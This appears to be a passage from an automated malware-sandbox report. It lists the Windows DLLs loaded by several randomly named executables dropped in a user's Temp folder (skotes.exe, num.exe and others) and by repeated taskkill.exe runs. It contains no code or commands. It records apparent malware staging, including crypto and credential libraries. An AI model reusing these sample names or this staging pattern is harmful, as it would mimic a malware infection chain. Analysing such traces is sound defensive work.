Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Section loaded: windows.storage.dll
